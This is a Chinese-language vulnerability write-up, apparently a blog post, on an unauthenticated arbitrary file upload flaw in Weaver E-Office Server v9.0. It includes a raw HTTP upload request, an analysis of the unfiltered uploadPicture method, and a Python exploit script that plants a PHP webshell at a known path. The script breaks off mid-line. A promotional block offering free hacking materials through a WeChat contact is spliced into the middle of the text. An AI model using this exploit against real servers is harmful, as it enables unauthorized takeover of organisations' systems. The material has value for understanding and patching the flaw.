E-office Server_v9.0 漏洞分析

漏洞简介

泛微e-office是一款标准化的协同OA办公软件，实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。由于泛微 E-Office 未能正确处理上传模块中输入的数据，未授权的攻击者可以构造恶意数据包发送给服务器，实现任意文件上传，并且获得服务器的webshell，成功利用该漏洞可以获取服务器控制权。未授权的攻击者可以构造恶意的数据包，读取服务器上的任意文件

漏洞影响范围 E-office Server_v9.0

默认安装位置是 d:\eoffice 在虚拟机内安装没有 D 盘，所以安装位置是 c:\eoffice

安装完成后，服务默认在 8082 端口 通过主机名 或 ip 地址都可以访问到

代码位置在 C:\eoffice\webroot 同样代码也是被加密了的

通过免费的解密网站获得了加密的具体信息 ZEND加密PHP5.2版本 http://www.phpjm.cc/

利用工具进行批量的解密，因为工具点击一次只能进行一次解密，所以利用模拟点击的工具进行模拟点击 KeymouseGo

任意文件上传漏洞 漏洞利用

/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=

‍

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 10.0.21.14:8082
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryykJoMlQs3JMOsgi3
Content-Length: 175

------WebKitFormBoundaryykJoMlQs3JMOsgi3
Content-Disposition: form-data; name="Filedata"; filename="1.php"


------WebKitFormBoundaryykJoMlQs3JMOsgi3--

上传文件的地址 http://10.0.21.14:8082/images/logo/logo-eoffice.php

【----帮助网安学习，以下所有学习资料免费领！加weix：yj009991，备注“ csdn ”获取！】 ① 网安学习成长路径思维导图 ② 60+网安经典常用工具包 ③ 100+SRC漏洞分析报告 ④ 150+网安攻防实战技术电子书 ⑤ 最权威CISSP 认证考试指南+题库 ⑥ 超1800页CTF实战技巧手册 ⑦ 最新网安大厂面试题合集（含答案） ⑧ APP客户端安全检测指南（安卓+IOS）

漏洞分析

漏洞的主要位于 general/index/UploadFile.php

通过 $_GET 方法获取的参数 m，调用 UploadFile 中的任意方法

我们选择其中的 uploadPicture 方法

没有对传入的文件进行过滤，如果传入一个 php 文件，命名为 1.php 最后上传文件会变为 logo-eoffice.php 传入的位置是$_SERVER['DOCUMENT_ROOT']."/images/logo/"

利用脚本

import sys
import requests

def request_shell(url):
    targeturl = url + "/images/logo/logo-eoffice.php"
    response = requests.get(targeturl)
    if(response.status_code == 200):
        print("获取 shell 成功，shell地址为："+targeturl)

def request_upload(url,data):
    targeturl = url + "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId="
    targetfile = {'Filedata':('upload.php',data,'text/plain')}
    response = requests.post(url = targeturl, files = targetfile)
    if(response.status_code == 200):
        print("上传成功")
  
def read_uploadfile(url,filename):
    with open(filename) as f:
        data = f.read()
    request_upload(url,data)

def upload_file(url,filename):
    if (filename == "phpinfo.php"):
        data = ""
        request_upload(url,data)
    else:
        read_uploadfile(url,filename)


def main():
    if len(sys.argv)